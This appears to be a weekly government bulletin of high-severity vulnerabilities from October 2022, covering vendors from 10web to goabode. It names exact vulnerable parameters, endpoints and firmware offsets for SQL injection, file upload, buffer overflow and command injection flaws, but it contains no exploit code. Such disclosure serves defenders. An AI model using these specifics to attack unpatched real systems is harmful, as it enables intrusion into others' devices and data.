Vulnerability Summary for the Week of October 24, 2022

Original release date: October 31, 2022

 

High Vulnerabilities

Primary Vendor — Product | Description | Published | CVSS Score | Source & Patch Info
10web — form_maker The Form Maker by 10Web WordPress plugin before 1.15.6 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin 2022-10-25 7.2 CVE-2022-3300
CONFIRM
adenion — blog2social The Blog2Social: Social Media Auto Post & Scheduler WordPress plugin before 6.9.10 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by any authenticated users, such as subscribers 2022-10-25 8.8 CVE-2022-3246
CONFIRM
adobe — illustrator Adobe Illustrator versions 26.4 (and earlier) and 25.4.7 (and earlier) are affected by an Improper Input Validation vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-10-25 7.8 CVE-2022-38435
MISC
adobe — illustrator Adobe Illustrator versions 26.4 (and earlier) and 25.4.7 (and earlier) are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-10-25 7.8 CVE-2022-38436
MISC
advantech — r-seenet Advantech R-SeeNet Versions 2.4.17 and prior are vulnerable to a stack-based buffer overflow. An unauthorized attacker can remotely overflow the stack buffer and enable remote code execution. 2022-10-27 9.8 CVE-2022-3385
MISC
advantech — r-seenet Advantech R-SeeNet Versions 2.4.17 and prior are vulnerable to a stack-based buffer overflow. An unauthorized attacker can use an outsized filename to overflow the stack buffer and enable remote code execution. 2022-10-27 9.8 CVE-2022-3386
MISC
apache — batik A vulnerability in Batik of Apache XML Graphics allows an attacker to run untrusted Java code from an SVG. This issue affects Apache XML Graphics prior to 1.16. It is recommended to update to version 1.16. 2022-10-25 7.5 CVE-2022-41704
MISC
MLIST
MLIST
DEBIAN
apache — batik A vulnerability in Batik of Apache XML Graphics allows an attacker to run Java code from untrusted SVG via JavaScript. This issue affects Apache XML Graphics prior to 1.16. Users are recommended to upgrade to version 1.16. 2022-10-25 7.5 CVE-2022-42890
MISC
MLIST
MLIST
DEBIAN
apache — flume Apache Flume versions 1.4.0 through 1.10.1 are vulnerable to a remote code execution (RCE) attack when a configuration uses a JMS Source with an unsafe providerURL. This issue is fixed by limiting JNDI to allow only the use of the java protocol or no protocol. 2022-10-26 9.8 CVE-2022-42468
CONFIRM
CONFIRM
CONFIRM
apache — heron Heron versions <= 0.20.4-incubating allow CRLF log injection because of the lack of escaping in the log statements. Please update to version 0.20.5-incubating, which addresses this issue. 2022-10-24 9.8 CVE-2021-42010
MISC
MLIST
apache — iotdb Apache IoTDB versions 0.12.2 to 0.12.6 and 0.13.0 to 0.13.2 are vulnerable to a Denial of Service attack when accepting untrusted patterns for REGEXP queries with Java 8. Users should upgrade to 0.13.3, which addresses this issue, or use a later version of Java to avoid it. 2022-10-26 7.5 CVE-2022-43766
CONFIRM
apache — linkis In Apache Linkis <=1.2.0 when used with the MySQL Connector/J, a deserialization vulnerability with possible remote code execution impact exists when an attacker has write access to a database and configures a JDBC EC with a MySQL data source and malicious parameters. Therefore, the parameters in the JDBC URL should be blacklisted. Versions of Apache Linkis <= 1.2.0 are affected. We recommend users update to 1.3.0. 2022-10-26 8.8 CVE-2022-39944
CONFIRM
arm — midguard_gpu_kernel_driver An Arm product family through 2022-08-12 Mali GPU kernel driver allows non-privileged users to make improper GPU processing operations to gain access to already freed memory. 2022-10-25 8.8 CVE-2022-38181
MISC
MISC
autodesk — autocad_plant_3d A maliciously crafted .dwf or .pct file, when consumed through the DesignReview.exe application, could lead to a memory corruption vulnerability by write access violation. This vulnerability, in conjunction with other vulnerabilities, could lead to code execution in the context of the current process. 2022-10-21 7.8 CVE-2022-41309
MISC
autodesk — autocad_plant_3d A maliciously crafted .dwf or .pct file, when consumed through the DesignReview.exe application, could lead to a memory corruption vulnerability by write access violation. This vulnerability, in conjunction with other vulnerabilities, could lead to code execution in the context of the current process. 2022-10-21 7.8 CVE-2022-41310
MISC
autodesk — autocad_plant_3d A maliciously crafted .dwf or .pct file, when consumed through the DesignReview.exe application, could lead to a memory corruption vulnerability by write access violation. This vulnerability, in conjunction with other vulnerabilities, could lead to code execution in the context of the current process. 2022-10-21 7.8 CVE-2022-42933
MISC
autodesk — autocad_plant_3d A maliciously crafted .dwf or .pct file, when consumed through the DesignReview.exe application, could lead to a memory corruption vulnerability by write access violation. This vulnerability, in conjunction with other vulnerabilities, could lead to code execution in the context of the current process. 2022-10-21 7.8 CVE-2022-42934
MISC
autodesk — autocad_plant_3d A maliciously crafted .dwf or .pct file, when consumed through the DesignReview.exe application, could lead to a memory corruption vulnerability by write access violation. This vulnerability, in conjunction with other vulnerabilities, could lead to code execution in the context of the current process. 2022-10-21 7.8 CVE-2022-42935
MISC
autodesk — autocad_plant_3d A maliciously crafted .dwf or .pct file, when consumed through the DesignReview.exe application, could lead to a memory corruption vulnerability by write access violation. This vulnerability, in conjunction with other vulnerabilities, could lead to code execution in the context of the current process. 2022-10-21 7.8 CVE-2022-42936
MISC
autodesk — autocad_plant_3d A maliciously crafted .dwf or .pct file, when consumed through the DesignReview.exe application, could lead to a memory corruption vulnerability by write access violation. This vulnerability, in conjunction with other vulnerabilities, could lead to code execution in the context of the current process. 2022-10-21 7.8 CVE-2022-42937
MISC
autodesk — autocad_plant_3d A maliciously crafted TGA file, when consumed through the DesignReview.exe application, could lead to a memory corruption vulnerability. This vulnerability, in conjunction with other vulnerabilities, could lead to code execution in the context of the current process. 2022-10-21 7.8 CVE-2022-42938
MISC
autodesk — autocad_plant_3d A maliciously crafted TGA file, when consumed through the DesignReview.exe application, could lead to a memory corruption vulnerability. This vulnerability, in conjunction with other vulnerabilities, could lead to code execution in the context of the current process. 2022-10-21 7.8 CVE-2022-42939
MISC
autodesk — autocad_plant_3d A maliciously crafted TGA file, when consumed through the DesignReview.exe application, could lead to a memory corruption vulnerability. This vulnerability, in conjunction with other vulnerabilities, could lead to code execution in the context of the current process. 2022-10-21 7.8 CVE-2022-42940
MISC
autodesk — autocad_plant_3d A maliciously crafted .dwf or .pct file, when consumed through the DesignReview.exe application, could lead to a memory corruption vulnerability by read access violation. This vulnerability, in conjunction with other vulnerabilities, could lead to code execution in the context of the current process. 2022-10-21 7.8 CVE-2022-42941
MISC
autodesk — autocad_plant_3d A maliciously crafted .dwf or .pct file, when consumed through the DesignReview.exe application, could lead to a memory corruption vulnerability by read access violation. This vulnerability, in conjunction with other vulnerabilities, could lead to code execution in the context of the current process. 2022-10-21 7.8 CVE-2022-42942
MISC
autodesk — autocad_plant_3d A maliciously crafted .dwf or .pct file, when consumed through the DesignReview.exe application, could lead to a memory corruption vulnerability by read access violation. This vulnerability, in conjunction with other vulnerabilities, could lead to code execution in the context of the current process. 2022-10-21 7.8 CVE-2022-42943
MISC
autodesk — autocad_plant_3d A maliciously crafted .dwf or .pct file, when consumed through the DesignReview.exe application, could lead to a memory corruption vulnerability by read access violation. This vulnerability, in conjunction with other vulnerabilities, could lead to code execution in the context of the current process. 2022-10-21 7.8 CVE-2022-42944
MISC
automox — automox The Automox Agent before 40 on Windows incorrectly sets permissions on key files. 2022-10-21 7.8 CVE-2022-36122
MISC
MISC
axiosys — bento4 A vulnerability was found in Axiomatic Bento4. It has been declared as critical. This vulnerability affects the function GetOffset of the file Ap4Sample.h of the component mp42hls. The manipulation leads to use after free. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-212002 is the identifier assigned to this vulnerability. 2022-10-26 7.8 CVE-2022-3662
MISC
MISC
MISC
axiosys — bento4 A vulnerability classified as critical has been found in Axiomatic Bento4. Affected is the function AP4_BitStream::WriteBytes of the file Ap4BitStream.cpp of the component avcinfo. The manipulation leads to heap-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-212004. 2022-10-26 7.8 CVE-2022-3664
MISC
MISC
MISC
axiosys — bento4 A vulnerability classified as critical was found in Axiomatic Bento4. Affected by this vulnerability is an unknown functionality of the file AvcInfo.cpp of the component avcinfo. The manipulation leads to heap-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-212005 was assigned to this vulnerability. 2022-10-26 7.8 CVE-2022-3665
MISC
MISC
MISC
axiosys — bento4 A vulnerability, which was classified as critical, has been found in Axiomatic Bento4. Affected by this issue is the function AP4_LinearReader::Advance of the file Ap4LinearReader.cpp of the component mp42ts. The manipulation leads to use after free. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-212006 is the identifier assigned to this vulnerability. 2022-10-26 7.8 CVE-2022-3666
MISC
MISC
MISC
axiosys — bento4 A vulnerability was found in Axiomatic Bento4. It has been classified as critical. Affected is the function WriteSample of the component mp42hevc. The manipulation leads to heap-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-212010 is the identifier assigned to this vulnerability. 2022-10-26 7.8 CVE-2022-3670
MISC
MISC
MISC
axiosys — bento4 A vulnerability, which was classified as critical, was found in Axiomatic Bento4. This affects the function AP4_MemoryByteStream::WritePartial of the file Ap4ByteStream.cpp of the component mp42aac. The manipulation leads to heap-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-212007. 2022-10-26 7.5 CVE-2022-3667
MISC
MISC
MISC
baramundi — management_suite baramundi Management Agent (bMA) in baramundi Management Suite (bMS) 2021 R1 and R2 and 2022 R1 allows remote code execution. This is fixed in 2022 R2. 2022-10-26 9.8 CVE-2022-43747
MISC
barangay_management_system_project — barangay_management_system Barangay Management System v1.0 was discovered to contain a SQL injection vulnerability via the hidden_id parameter at /clearance/clearance.php. 2022-10-28 7.2 CVE-2022-43228
MISC
bestwebsoft — post_to_csv The Post to CSV by BestWebSoft WordPress plugin through 1.4.0 does not properly escape fields when exporting data as CSV, leading to a CSV injection 2022-10-25 9.8 CVE-2022-3393
CONFIRM
broadcom — fabric_operating_system Brocade Webtools in Brocade Fabric OS versions before v9.1.1, v9.0.1e, and v8.2.3c could allow a low-privilege Webtools user to gain elevated admin rights, or privileges beyond what is intended or entitled for that user. By exploiting this vulnerability, a user whose role is not an admin can create a new user with an admin role using the operator session id. The issue was replicated after intercepting the admin and operator authorization headers sent unencrypted and editing a user addition request to use the operator’s authorization header. 2022-10-25 8.8 CVE-2022-28169
MISC
broadcom — fabric_operating_system A vulnerability in Brocade Fabric OS CLI before Brocade Fabric OS v9.1.0, 9.0.1e, 8.2.3c, and 7.4.2j could allow a local authenticated user to break out of restricted shells with “set context” and escalate privileges. 2022-10-25 8.8 CVE-2022-33179
MISC
broadcom — fabric_operating_system A vulnerability in Brocade Fabric OS CLI before Brocade Fabric OS v9.1.0, 9.0.1e, 8.2.3c, 8.2.0cbn5, 7.4.2.j could allow a remote authenticated attacker to perform a stack buffer overflow using the “firmwaredownload” and “diagshow” commands. 2022-10-25 8.8 CVE-2022-33183
MISC
broadcom — fabric_operating_system A privilege escalation vulnerability in Brocade Fabric OS CLI before Brocade Fabric OS v9.1.0, 9.0.1e, 8.2.3c, 8.2.0cbn5, could allow a local authenticated user to escalate their privileges to root using the switch commands “supportlink”, “firmwaredownload”, “portcfgupload”, “license”, and “fosexec”. 2022-10-25 7.8 CVE-2022-33182
MISC
broadcom — fabric_operating_system A vulnerability in fab_seg.c.h libraries of all Brocade Fabric OS versions before Brocade Fabric OS v9.1.1, v9.0.1e, v8.2.3c, v8.2.0_cbn5, 7.4.2j could allow local authenticated attackers to exploit stack-based buffer overflows and execute arbitrary code as the root user account. 2022-10-25 7.8 CVE-2022-33184
MISC
broadcom — fabric_operating_system Several commands in Brocade Fabric OS before Brocade Fabric OS v.9.0.1e, and v9.1.0 use unsafe string functions to process user input. Authenticated local attackers could abuse these vulnerabilities to exploit stack-based buffer overflows, allowing arbitrary code execution as the root user account. 2022-10-25 7.8 CVE-2022-33185
MISC
broadcom — fabric_operating_system A vulnerability in the RADIUS authentication system of Brocade Fabric OS before Brocade Fabric OS 9.0 could allow a remote attacker to execute arbitrary code on the Brocade switch. 2022-10-25 7.2 CVE-2022-33178
MISC
canteen_management_system_project — canteen_management_system Canteen Management System v1.0 was discovered to contain an arbitrary file upload vulnerability via /youthappam/manage_website.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file. 2022-10-28 7.2 CVE-2022-43231
MISC
canteen_management_system_project — canteen_management_system Canteen Management System v1.0 was discovered to contain a SQL injection vulnerability via the userid parameter at /php_action/fetchOrderData.php. 2022-10-28 7.2 CVE-2022-43232
MISC
canteen_management_system_project — canteen_management_system Canteen Management System v1.0 was discovered to contain a SQL injection vulnerability via the userid parameter at /php_action/fetchSelectedUser.php. 2022-10-28 7.2 CVE-2022-43233
MISC
canteen_management_system_project — canteen_management_system Canteen Management System v1.0 was discovered to contain an arbitrary file upload vulnerability via /youthappam/php_action/editProductImage.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file. 2022-10-28 7.2 CVE-2022-43275
MISC
canteen_management_system_project — canteen_management_system Canteen Management System v1.0 was discovered to contain a SQL injection vulnerability via the productId parameter at /php_action/fetchSelectedfood.php. 2022-10-28 7.2 CVE-2022-43276
MISC
cert — vince A Remote Code Injection vulnerability exists in CERT software prior to version 1.50.5. An authenticated attacker can inject an arbitrary pickle object as part of a user’s profile. This can lead to code execution on the server when the user’s profile is accessed. 2022-10-26 8.8 CVE-2022-40238
MISC
cleantalk — spam_protection,_antispam,_firewall The Spam protection, AntiSpam, FireWall by CleanTalk WordPress plugin before 5.185.1 does not validate ids before using them in a SQL statement, which could lead to SQL injection exploitable by high privilege users such as admin 2022-10-25 7.2 CVE-2022-3302
CONFIRM
dataease — dataease Dataease is an open source data visualization analysis tool. Dataease prior to 1.15.2 has a deserialization vulnerability. In Dataease, the Mysql data source in the data source function can customize the JDBC connection parameters and the Mysql server target to be connected. In `backend/src/main/java/io/dataease/provider/datasource/JdbcProvider.java`, the `MysqlConfiguration` class does not filter any parameters. If an attacker adds some parameters to a JDBC url and connects to a malicious mysql server, the attacker can trigger the mysql jdbc deserialization vulnerability. Through the deserialization vulnerability, the attacker can execute system commands and obtain server privileges. Version 1.15.2 contains a patch for this issue. 2022-10-25 9.8 CVE-2022-39312
MISC
MISC
MISC
CONFIRM
dell — emc_powerscale_onefs Dell PowerScale OneFS versions 8.2.0.x-9.4.0.x contain an Allocation of Resources Without Limits or Throttling vulnerability. A remote unauthenticated attacker could potentially exploit this vulnerability, leading to denial of service and performance issues on that node. 2022-10-21 7.5 CVE-2022-34439
CONFIRM
dell — powerstoreos Dell PowerStore versions 2.1.0.x contain an Authentication bypass vulnerability. A remote unauthenticated attacker could potentially exploit this vulnerability under specific configuration. An attacker would gain unauthorized access upon successful exploit. 2022-10-21 9.8 CVE-2022-26870
CONFIRM
deltaww — diaenergie The HandlerPageP_KID class in Delta Electronics DIAEnergy v1.9 contains a SQL Injection flaw that could allow an attacker to gain code execution on a remote system. 2022-10-26 9.8 CVE-2022-43774
MISC
deltaww — diaenergie The HICT_Loop class in Delta Electronics DIAEnergy v1.9 contains a SQL Injection flaw that could allow an attacker to gain code execution on a remote system. 2022-10-26 9.8 CVE-2022-43775
MISC
deltaww — diaenergie The affected product DIAEnergie (versions prior to v1.9.01.002) is vulnerable to a SQL injection that exists in CheckIoTHubNameExisted. A low-privileged authenticated attacker could exploit this issue to inject arbitrary SQL queries. 2022-10-27 8.8 CVE-2022-40967
MISC
deltaww — diaenergie The affected product DIAEnergie (versions prior to v1.9.01.002) is vulnerable to a SQL injection that exists in GetDIAE_line_message_settingsListParameters. A low-privileged authenticated attacker could exploit this issue to inject arbitrary SQL queries. 2022-10-27 8.8 CVE-2022-41133
MISC
deltaww — diaenergie The affected product DIAEnergie (versions prior to v1.9.01.002) is vulnerable to a SQL injection that exists in CheckDIACloud. A low-privileged authenticated attacker could exploit this issue to inject arbitrary SQL queries. 2022-10-27 8.8 CVE-2022-41773
MISC
discourse — patreon Discourse Patreon enables synchronization between Discourse Groups and Patreon rewards. On sites with Patreon login enabled, an improper authentication vulnerability could be used to take control of a victim’s forum account. This vulnerability is patched in commit number 846d012151514b35ce42a1636c7d70f6dcee879e of the discourse-patreon plugin. Out of an abundance of caution, any Discourse accounts which have logged in with an unverified-email Patreon account will be logged out and asked to verify their email address on their next login. As a workaround, disable the Patreon integration and log out all users with associated Patreon accounts. 2022-10-26 9.8 CVE-2022-39355
MISC
CONFIRM
dlink — dir-816_firmware D-Link DIR-816 A2 1.10 B05 was discovered to contain a stack overflow via the srcip parameter at /goform/form2IPQoSTcAdd. 2022-10-26 9.8 CVE-2022-42998
MISC
MISC
dlink — dir-816_firmware D-Link DIR-816 A2 1.10 B05 was discovered to contain a stack overflow via the wizardstep4_pskpwd parameter at /goform/form2WizardStep4. 2022-10-26 9.8 CVE-2022-43000
MISC
MISC
dlink — dir-816_firmware D-Link DIR-816 A2 1.10 B05 was discovered to contain a stack overflow via the pskValue parameter in the setSecurity function. 2022-10-26 9.8 CVE-2022-43001
MISC
MISC
dlink — dir-816_firmware D-Link DIR-816 A2 1.10 B05 was discovered to contain a stack overflow via the wizardstep54_pskpwd parameter at /goform/form2WizardStep54. 2022-10-26 9.8 CVE-2022-43002
MISC
MISC
dlink — dir-816_firmware D-Link DIR-816 A2 1.10 B05 was discovered to contain a stack overflow via the pskValue parameter in the setRepeaterSecurity function. 2022-10-26 9.8 CVE-2022-43003
MISC
MISC
dlink — dir-816_firmware D-Link DIR-816 A2 1.10 B05 was discovered to contain multiple command injection vulnerabilities via the admuser and admpass parameters at /goform/setSysAdm. 2022-10-26 7.5 CVE-2022-42999
MISC
MISC
elearning_system_project — elearning_system A vulnerability classified as critical was found in SourceCodester eLearning System 1.0. This vulnerability affects unknown code of the file /admin/students/manage.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-212014 is the identifier assigned to this vulnerability. 2022-10-26 9.8 CVE-2022-3671
N/A
N/A
employee_record_management_system_project — employee_record_management_system Employee Record Management System v 1.2 is vulnerable to SQL Injection via editempprofile.php. 2022-10-28 9.8 CVE-2021-37782
MISC
MISC
evm_project — evm SputnikVM, also called evm, is a Rust implementation of Ethereum Virtual Machine. A custom stateful precompile can use the `is_static` parameter to determine if the call is executed in a static context (via `STATICCALL`), and thus decide if stateful operations should be done. Prior to version 0.36.0, the passed `is_static` parameter was incorrect — it was only set to `true` if the call came from a direct `STATICCALL` opcode. However, once a static call context is entered, it should stay static. The issue only impacts custom precompiles that actually use `is_static`. For those affected, the issue can lead to possible incorrect state transitions. Version 0.36.0 contains a patch. There are no known workarounds. 2022-10-25 7.5 CVE-2022-39354
MISC
CONFIRM
exiv2 — exiv2 A vulnerability, which was classified as critical, has been found in Exiv2. Affected by this issue is the function BmffImage::boxHandler of the file bmffimage.cpp. The manipulation leads to memory corruption. The attack may be launched remotely. The name of the patch is a58e52ed702d3bc7b8bab7ec1d70a4849eebece3. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-212348. 2022-10-27 9.8 CVE-2022-3717
MISC
MISC
exiv2 — exiv2 A vulnerability has been found in Exiv2 and classified as critical. This vulnerability affects the function QuickTimeVideo::userDataDecoder of the file quicktimevideo.cpp of the component QuickTime Video Handler. The manipulation leads to heap-based buffer overflow. The attack can be initiated remotely. The name of the patch is a38e124076138e529774d5ec9890d0731058115a. It is recommended to apply a patch to fix this issue. VDB-212350 is the identifier assigned to this vulnerability. 2022-10-27 9.8 CVE-2022-3719
MISC
MISC
MISC
extended_keccak_code_package_project — extended_keccak_code_package The Keccak XKCP SHA-3 reference implementation before fdc6fef has an integer overflow and resultant buffer overflow that allows attackers to execute arbitrary code or eliminate expected cryptographic properties. This occurs in the sponge function interface. 2022-10-21 9.8 CVE-2022-37454
MISC
MISC
MISC
MISC
f5 — nginx A vulnerability was found in Nginx and classified as problematic. This issue affects some unknown processing of the file ngx_resolver.c of the component IPv4 Off Handler. The manipulation leads to memory leak. The attack may be initiated remotely. It is recommended to apply a patch to fix this issue. The identifier VDB-211937 was assigned to this vulnerability. 2022-10-21 7.5 CVE-2022-3638
N/A
N/A
N/A
featherjs — feathers-sequelize Due to improper input validation in the Feathers js library, it is possible to perform a SQL injection attack on the back-end database, in case the feathers-sequelize package is used. 2022-10-26 9.8 CVE-2022-2422
CONFIRM
CONFIRM
featherjs — feathers-sequelize Improper parameter filtering in the Feathers js library may ultimately lead to SQL injection. 2022-10-26 9.8 CVE-2022-29822
CONFIRM
CONFIRM
featherjs — feathers-sequelize The feathers-sequelize cleanQuery method uses insecure recursive logic to filter unsupported keys from the query object. This results in Remote Code Execution (RCE) with the privileges of the application. 2022-10-26 9.8 CVE-2022-29823
CONFIRM
CONFIRM
free5gc — free5gc Free5gc v3.2.1 is vulnerable to Information disclosure. 2022-10-25 7.5 CVE-2022-38870
MISC
gin-vue-admin_project — gin-vue-admin Gin-vue-admin is a backstage management system based on vue and gin, which separates the front and rear of the full stack. Versions prior to 2.5.4 contain a file upload ability. The affected code fails to validate fileMd5 and fileName parameters, resulting in an arbitrary file being read. This issue is patched in 2.5.4b. There are no known workarounds. 2022-10-24 9.8 CVE-2022-39305
MISC
CONFIRM
gin-vue-admin_project — gin-vue-admin Gin-vue-admin is a backstage management system based on vue and gin, which separates the front and rear of the full stack. Gin-vue-admin prior to 2.5.4 is vulnerable to path traversal, which leads to file upload vulnerabilities. Version 2.5.4 contains a patch for this issue. There are no workarounds aside from upgrading to a patched version. 2022-10-25 7.5 CVE-2022-39345
CONFIRM
MISC
MISC
MISC
github — runner GitHub Actions Runner is the application that runs a job from a GitHub Actions workflow. The actions runner invokes the docker cli directly in order to run job containers, service containers, or container actions. A bug in the logic for how the environment is encoded into these docker commands was discovered in versions prior to 2.296.2, 2.293.1, 2.289.4, 2.285.2, and 2.283.4 that allows an input to escape the environment variable and modify that docker command invocation directly. Jobs that use container actions, job containers, or service containers alongside untrusted user inputs in environment variables may be vulnerable. The Actions Runner has been patched, both on `github.com` and hotfixes for GHES and GHAE customers in versions 2.296.2, 2.293.1, 2.289.4, 2.285.2, and 2.283.4. GHES and GHAE customers may want to patch their instance in order to have their runners automatically upgrade to these new runner versions. As a workaround, users may consider removing any container actions, job containers, or service containers from their jobs until they are able to upgrade their runner versions. 2022-10-25 9.9 CVE-2022-39321
MISC
MISC
CONFIRM
gnu — libtasn1 GNU Libtasn1 before 4.19.0 has an ETYPE_OK off-by-one array size check that affects asn1_encode_simple_der. 2022-10-24 9.1 CVE-2021-46848
MISC
MISC
MISC
goabode — iota_all-in-one_security_kit_firmware Four OS command injection vulnerabilities exist in the XCMD testWifiAP functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. An XCMD can lead to arbitrary command execution. An attacker can send a sequence of malicious commands to trigger these vulnerabilities. This vulnerability specifically focuses on the unsafe use of the `WL_SSID` and `WL_SSID_HEX` configuration values in the function at offset `0x1c7d28` of firmware 6.9Z. 2022-10-25 10 CVE-2022-33192
MISC
goabode — iota_all-in-one_security_kit_firmware Four OS command injection vulnerabilities exist in the XCMD testWifiAP functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. An XCMD can lead to arbitrary command execution. An attacker can send a sequence of malicious commands to trigger these vulnerabilities. This vulnerability specifically focuses on the unsafe use of the `WL_WPAPSK` configuration value in the function located at offset `0x1c7d28` of firmware 6.9Z. 2022-10-25 10 CVE-2022-33193
MISC
goabode — iota_all-in-one_security_kit_firmware Four OS command injection vulnerabilities exist in the XCMD testWifiAP functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. An XCMD can lead to arbitrary command execution. An attacker can send a sequence of malicious commands to trigger these vulnerabilities. This vulnerability focuses on the unsafe use of the `WL_Key` and `WL_DefaultKeyID` configuration values in the function located at offset `0x1c7d28` of firmware 6.9Z, and even more specifically on the command execution occurring at offset `0x1c7f6c`. 2022-10-25 10 CVE-2022-33194
MISC
goabode — iota_all-in-one_security_kit_firmware Four OS command injection vulnerabilities exist in the XCMD testWifiAP functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. An XCMD can lead to arbitrary command execution. An attacker can send a sequence of malicious commands to trigger these vulnerabilities. This vulnerability focuses on the unsafe use of the `WL_DefaultKeyID` in the function located at offset `0x1c7d28` of firmware 6.9Z, and even more specifically on the command execution occurring at offset `0x1c7fac`. 2022-10-25 10 CVE-2022-33195
MISC
goabode — iota_all-in-one_security_kit_firmware Four OS command injection vulnerabilities exist in the web interface /action/wirelessConnect functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. A specially-crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger these vulnerabilities. This vulnerability focuses on the unsafe use of the `ssid_hex` HTTP parameter to construct an OS Command at offset `0x19afc0` of the `/root/hpgw` binary included in firmware 6.9Z. 2022-10-25 9.9 CVE-2022-33204
MISC
goabode — iota_all-in-one_security_kit_firmware Four OS command injection vulnerabilities exist in the web interface /action/wirelessConnect functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. A specially-crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger these vulnerabilities. This vulnerability focuses on the unsafe use of the `wpapsk_hex` HTTP parameter to construct an OS Command at offset `0x19b0ac` of the `/root/hpgw` binary included in firmware 6.9Z. 2022-10-25 9.9 CVE-2022-33205
MISC
goabode — iota_all-in-one_security_kit_firmware Four OS command injection vulnerabilities exist in the web interface /action/wirelessConnect functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. A specially-crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger these vulnerabilities. This vulnerability focuses on the unsafe use of the `key` and `default_key_id` HTTP parameters to construct an OS Command crafted at offset `0x19b1f4` of the `/root/hpgw` binary included in firmware 6.9Z. 2022-10-25 9.9 CVE-2022-33206
MISC
goabode — iota_all-in-one_security_kit_firmware Four OS command injection vulnerabilities exist in the web interface /action/wirelessConnect functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. A specially-crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger these vulnerabilities. This vulnerability focuses on a second unsafe use of the `default_key_id` HTTP parameter to construct an OS Command at offset `0x19B234` of the `/root/hpgw` binary included in firmware 6.9Z. 2022-10-25 9.9 CVE-2022-33207
MISC
goabode — iota_all-in-one_security_kit_firmware An OS command injection vulnerability exists in the web interface util_set_abode_code functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. A specially-crafted HTTP request can lead to arbitrary command execution. An attacker can send an HTTP request to trigger this vulnerability. 2022-10-25 9.8 CVE-2022-27804
MISC
goabode — iota_all-in-one_security_kit_firmware An authentication bypass vulnerability exists in the GHOME control functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. A specially-crafted network request can lead to arbitrary XCMD execution. An attacker can send a malicious XML payload to trigger this vulnerability. 2022-10-25 9.8 CVE-2022-27805
MISC
goabode — iota_all-in-one_security_kit_firmware An OS command injection vulnerability exists in the web interface util_set_serial_mac functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. A specially-crafted HTTP request can lead to arbitrary command execution. An attacker can send an HTTP request to trigger this vulnerability. 2022-10-25 9.8 CVE-2022-29472
MISC
goabode — iota_all-in-one_security_kit_firmware An authentication bypass vulnerability exists in the web interface /action/factory* functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. A specially-crafted HTTP header can lead to authentication bypass. An attacker can send an HTTP request to trigger this vulnerability. 2022-10-25 9.8 CVE-2022-29477
MISC
goabode — iota_all-in-one_security_kit_firmware An OS command injection vulnerability exists in the console_main_loop :sys functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9Z. A specially-crafted XCMD can lead to arbitrary command execution. An attacker can send an XML payload to trigger this vulnerability. 2022-10-25 9.8 CVE-2022-29520
MISC
goabode — iota_all-in-one_security_kit_firmware A hard-coded password vulnerability exists in the telnet functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9Z. Use of a hard-coded root password can lead to arbitrary command execution. An attacker can authenticate with hard-coded credentials to trigger this vulnerability. 2022-10-25 9.8 CVE-2022-29889
MISC
goabode — iota_all-in-one_security_kit_firmware An OS command injection vulnerability exists in the XCMD setUPnP functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. A specially-crafted XCMD can lead to arbitrary command execution. An attacker can send a malicious XML payload to trigger this vulnerability. 2022-10-25 9.8 CVE-2022-30541
MISC
goabode — iota_all-in-one_security_kit_firmware A stack-based buffer overflow vulnerability exists in the XCMD setIPCam functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. A specially-crafted XCMD can lead to remote code execution. An attacker can send a malicious XML payload to trigger this vulnerability. 2022-10-25 9.8 CVE-2022-32454
MISC
goabode — iota_all-in-one_security_kit_firmware An OS command injection vulnerability exists in the XCMD doDebug functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9X and 6.9Z. A specially-crafted XCMD can lead to arbitrary command execution. An attacker can send a malicious XML payload to trigger this vulnerability. 2022-10-25 9.8 CVE-2022-32773
MISC
goabode — iota_all-in-one_security_kit_firmware An OS command injection vulnerability exists in the XCMD setAlexa functionality of Abode Systems, Inc. iota All-In-One Security Kit 6.9Z. A specially-crafted XCMD can lead to arbitrary command execution. An attacker can send a malicious XML payload to trigger this vulnerability. 2022-10-25 9.8 CVE-2022-33189
MISC
